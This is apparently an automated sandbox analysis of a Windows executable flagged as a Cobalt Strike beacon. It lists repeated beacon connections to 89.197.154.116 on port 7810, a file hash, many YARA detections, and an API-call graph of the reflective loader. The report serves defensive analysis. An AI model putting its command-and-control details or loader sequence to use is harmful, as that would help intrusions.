                                          Oct 13, 2024 01:59:45.151952028 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.152055979 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.152473927 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.157371044 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.759973049 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.760051966 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.894725084 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.894793987 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.895117998 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.899981022 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:47.280678988 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.286189079 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:47.453869104 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:47.453926086 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:47.453955889 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.453994036 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.454387903 CEST500897810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.459233046 CEST78105008989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:47.564987898 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.570209026 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:47.570286989 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.570621967 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:47.575535059 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:48.170382977 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:48.170631886 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:48.301243067 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:48.301775932 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:48.302244902 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:48.307127953 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:49.705555916 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:49.710479021 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.038779974 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.038839102 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.038875103 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.038903952 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.038911104 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.038945913 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.039127111 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.039273977 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.039455891 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.044133902 CEST78105009189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.044270992 CEST500917810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.143754005 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.149292946 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.149410009 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.149734020 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.154654026 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.771594048 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.771816015 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.905148983 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:50.905370951 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.905678988 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:50.910590887 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:52.288604021 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.293633938 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:52.471230030 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:52.471286058 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:52.471460104 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.471460104 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.471719027 CEST500937810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.476880074 CEST78105009389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:52.580559015 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.585591078 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:52.585680008 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.586074114 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:52.590939045 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:53.200779915 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:53.200984955 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:53.332794905 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:53.332882881 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:53.333478928 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:53.338296890 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.609019041 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.614419937 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.783337116 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.783406973 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.783484936 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.783484936 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.783581972 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.783647060 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.783905029 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.783941031 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.788798094 CEST78105009589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.788852930 CEST500957810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.893181086 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.898123980 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:54.898201942 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.898511887 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:54.903436899 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:55.526124954 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:55.526273012 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:55.667193890 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:55.667274952 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:55.667746067 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:55.673187971 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.105783939 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.110825062 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.286041975 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.286097050 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.286124945 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.286128998 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.286165953 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.286175966 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.286515951 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.286545038 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.291596889 CEST78105009789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.291666031 CEST500977810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.393332958 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.398797989 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:57.398940086 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.399185896 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:57.404323101 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:58.016391993 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:58.016625881 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:58.145088911 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:58.145186901 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:58.145598888 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:58.150501966 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.502660036 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.507827997 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.677612066 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.677659035 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.677695990 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.677706003 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.677782059 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.677782059 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.678127050 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.678234100 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.682910919 CEST78105009989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.683058977 CEST500997810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.784298897 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.789522886 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:59.789622068 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.789906979 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:59.794871092 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:00.393512011 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:00.393956900 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:00.525599003 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:00.525924921 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:00.555548906 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:00.560570955 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:01.995090008 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.000591993 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.168920994 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.168982029 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.169128895 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.169888973 CEST501017810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.175359011 CEST78105010189.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.283826113 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.289258957 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.289418936 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.289716959 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:02.294874907 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.899909019 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:02.899996996 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:03.040719032 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:03.040797949 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:03.075722933 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:03.080557108 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.783369064 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.788480997 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958766937 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958818913 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958853006 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.958966017 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.958966017 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.959321976 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.959570885 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:04.964298010 CEST78105010389.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:04.964596987 CEST501037810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.069991112 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.075206995 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.075366020 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.075967073 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.080782890 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.681389093 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.681679010 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.813782930 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:05.813868999 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.814635992 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:05.819480896 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.266956091 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.272206068 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.439795017 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.439841032 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.440172911 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.440551043 CEST501057810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.445389986 CEST78105010589.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.549746037 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.554791927 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:07.554904938 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.555305958 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:07.560122967 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:08.156397104 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:08.156493902 CEST501077810192.168.2.489.197.154.116
                                          Oct 13, 2024 02:00:08.292927980 CEST78105010789.197.154.116192.168.2.4
                                          Oct 13, 2024 02:00:08.293020010 CEST501077810192.168.2.489.197.154.116

                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:19:58:02
                                          Start date:12/10/2024
                                          Path:C:\Users\user\Desktop\A1E0xfcSNl.exe
                                          Wow64 process (32bit):false
                                          Commandline:"C:\Users\user\Desktop\A1E0xfcSNl.exe"
                                          Imagebase:0x400000
                                          File size:328'704 bytes
                                          MD5 hash:F05982B55C7A85B9E71A941FE2295848
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.2976258037.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_CobaltStrike_2, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike_4, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
                                          • Rule: Leviathan_CobaltStrike_Sample_1, Description: Detects Cobalt Strike sample from Leviathan report, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: crime_win32_csbeacon_1, Description: Detects Cobalt Strike loader, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: @VK_Intel
                                          • Rule: WiltedTulip_ReflectiveLoader, Description: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: Florian Roth
                                          • Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: MALWARE_Win_CobaltStrike, Description: CobaltStrike payload, Source: 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                          Reputation:low
                                          Has exited:false

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:1.6%
                                            Dynamic/Decrypted Code Coverage:77.2%
                                            Signature Coverage:10.9%
                                            Total number of Nodes:320
                                            Total number of Limit Nodes:17
                                            execution_graph 37490 4014c0 37495 401990 37490->37495 37492 4014d6 37499 401180 37492->37499 37494 4014db 37496 4019d0 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 37495->37496 37497 4019b9 37495->37497 37498 401a2b 37496->37498 37497->37492 37498->37492 37500 401460 GetStartupInfoA 37499->37500 37501 4011b4 37499->37501 37503 4013b4 37500->37503 37502 4011e1 Sleep 37501->37502 37504 4011f6 37501->37504 37502->37501 37503->37494 37504->37503 37505 401229 37504->37505 37506 40142c _initterm 37504->37506 37517 401fd0 37505->37517 37506->37505 37508 401251 SetUnhandledExceptionFilter 37537 4024e0 37508->37537 37510 40130e malloc 37512 401335 37510->37512 37514 40137b 37510->37514 37511 40126d 37511->37510 37513 401340 strlen malloc memcpy 37512->37513 37513->37513 37515 401376 37513->37515 37543 403040 37514->37543 37515->37514 37522 402008 37517->37522 37536 401ff2 37517->37536 37518 402240 37520 40223a 37518->37520 37518->37536 37519 4021ce 37525 40228c 37519->37525 37548 401dc0 8 API calls 37519->37548 37520->37518 37520->37525 37550 401dc0 8 API calls 37520->37550 37521 4022a8 37552 401d50 8 API calls 37521->37552 37522->37518 37522->37519 37522->37521 37532 4020b0 37522->37532 37522->37536 37551 401d50 8 API calls 37525->37551 37528 402208 37549 401dc0 8 API calls 37528->37549 37529 4022b4 37529->37508 37531 401dc0 8 API calls 37531->37532 37532->37519 37532->37525 37532->37528 37532->37531 37533 402156 37532->37533 37534 402160 37532->37534 37533->37534 37535 402192 VirtualProtect 37534->37535 37534->37536 37535->37534 37536->37508 37539 4024ef 37537->37539 37538 40251c 37538->37511 37539->37538 37553 402a80 strncmp 37539->37553 37541 402517 37541->37538 37542 4025c5 RtlAddFunctionTable 37541->37542 37542->37538 37544 40304a 37543->37544 37554 4017f8 GetTickCount 37544->37554 37547 403058 SleepEx 37547->37547 37548->37528 37549->37520 37550->37520 37551->37521 37552->37529 37553->37541 37555 402e28 37554->37555 37556 401866 CreateThread 37555->37556 37557 4017a6 malloc 37556->37557 37572 4016e6 37556->37572 37558 4017c8 SleepEx 37557->37558 37564 401704 CreateFileA 37558->37564 37561 4017de 37569 401595 VirtualAlloc 37561->37569 37563 4017ed 37563->37547 37565 40179c 37564->37565 37568 40175e 37564->37568 37565->37558 37565->37561 37566 401781 CloseHandle 37566->37565 37567 401762 ReadFile 37567->37566 37567->37568 37568->37566 37568->37567 37570 4015c7 37569->37570 37571 4015e8 VirtualProtect CreateThread 37570->37571 37571->37563 37575 401630 CreateNamedPipeA 37572->37575 37576 4016dc 37575->37576 37577 40168f ConnectNamedPipe 37575->37577 37577->37576 37578 4016a3 37577->37578 37579 4016c6 CloseHandle 37578->37579 37580 4016a7 WriteFile 37578->37580 37579->37576 37580->37578 37580->37579 37581 7d9cec 37582 7d9d01 37581->37582 37585 7d9d1e 37581->37585 37583 7d9d0f 37582->37583 37582->37585 37589 7d1d18 8 API calls _getptd_noexit 37583->37589 37586 7d9d36 HeapAlloc 37585->37586 37587 7d9d14 37585->37587 37590 7d1db4 DecodePointer 37585->37590 37586->37585 37586->37587 37589->37587 37590->37585 37591 7788d4 37592 778961 37591->37592 37597 779324 37592->37597 37594 778a01 37601 7796b4 37594->37601 37596 778a8f 37600 77935e 37597->37600 37598 779455 VirtualAlloc 37599 779479 37598->37599 37599->37594 37600->37598 37600->37599 37604 779723 37601->37604 37602 77994f 37602->37596 37603 77976e LoadLibraryA 37603->37604 37604->37602 37604->37603 37605 7d1b48 37606 7d1b64 37605->37606 37609 7d1b69 37605->37609 37619 7d92d0 GetSystemTimeAsFileTime GetCurrentThreadId QueryPerformanceCounter __security_init_cookie 37606->37619 37613 7d1bf4 37609->37613 37614 7d1bbe 37609->37614 37620 7d19e8 118 API calls 15 library calls 37609->37620 37610 7d1c12 37612 7d1c3b 37610->37612 37616 7c93e0 _DllMainCRTStartup 206 API calls 37610->37616 37612->37614 37637 7d19e8 118 API calls 15 library calls 37612->37637 37613->37614 37621 7c93e0 37613->37621 37617 7d1c2e 37616->37617 37636 7d19e8 118 API calls 15 library calls 37617->37636 37619->37609 37620->37613 37622 7c94bb 37621->37622 37625 7c9402 _DllMainCRTStartup 37621->37625 37705 7cb47c 37622->37705 37624 7c9407 _DllMainCRTStartup 37624->37610 37625->37624 37635 7c9465 _DllMainCRTStartup 37625->37635 37722 7cd4d8 GetCurrentProcess GetCurrentProcess _RTC_GetSrcLine _DllMainCRTStartup 37625->37722 37628 7c9448 37629 7c949f 37628->37629 37630 7c9457 37628->37630 37628->37635 37629->37635 37725 7cd134 GetCurrentProcess GetCurrentProcess _DllMainCRTStartup 37629->37725 37630->37635 37723 7cd2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37630->37723 37633 7c9487 37633->37635 37724 7cd2ec GetCurrentProcess VirtualFree _DllMainCRTStartup 37633->37724 37638 7bca74 37635->37638 37636->37612 37637->37614 37726 7c5fec 37638->37726 37640 7bca92 _DllMainCRTStartup 37733 7cf284 37640->37733 37642 7bcb40 _DllMainCRTStartup 37750 7cc230 37642->37750 37648 7bcbb5 37649 7ceaa8 _DllMainCRTStartup 41 API calls 37648->37649 37650 7bcbcf 37649->37650 37775 7bf3c0 37650->37775 37653 7bcbd8 37837 7cda74 20 API calls 2 library calls 37653->37837 37655 7bcbdd _DllMainCRTStartup 37656 7bcbf9 37655->37656 37657 7bcbf4 37655->37657 37780 7bf1f8 37656->37780 37838 7cda74 20 API calls 2 library calls 37657->37838 37661 7bcc09 37839 7cda74 20 API calls 2 library calls 37661->37839 37662 7bcc0e 37786 7bf274 37662->37786 37666 7bcc17 37840 7cda74 20 API calls 2 library calls 37666->37840 37668 7bcc1c _DllMainCRTStartup 37669 7cf284 malloc 38 API calls 37668->37669 37670 7bcc4f 37669->37670 37671 7bcc5c _DllMainCRTStartup 37670->37671 37672 7bcc57 37670->37672 37674 7ceaa8 _DllMainCRTStartup 41 API calls 37671->37674 37841 7cda74 20 API calls 2 library calls 37672->37841 37675 7bcc78 _DllMainCRTStartup 37674->37675 37798 7c5c60 GetACP 37675->37798 37706 7c5fec _DllMainCRTStartup 38 API calls 37705->37706 37707 7cb4a0 __crtGetStringTypeA_stat _DllMainCRTStartup 37706->37707 37708 7cf284 malloc 38 API calls 37707->37708 37709 7cb52d __crtGetStringTypeA_stat 37708->37709 37710 7ceaa8 _DllMainCRTStartup 41 API calls 37709->37710 37711 7cb55e _DllMainCRTStartup 37710->37711 37713 7cb575 _DllMainCRTStartup 37711->37713 37967 7bf014 37711->37967 37714 7cb611 GetComputerNameA 37713->37714 37716 7cb634 _setmbcp _DllMainCRTStartup 37713->37716 37972 7cbaa8 _DllMainCRTStartup 37714->37972 37719 7cf284 malloc 38 API calls 37716->37719 37720 7cb802 37716->37720 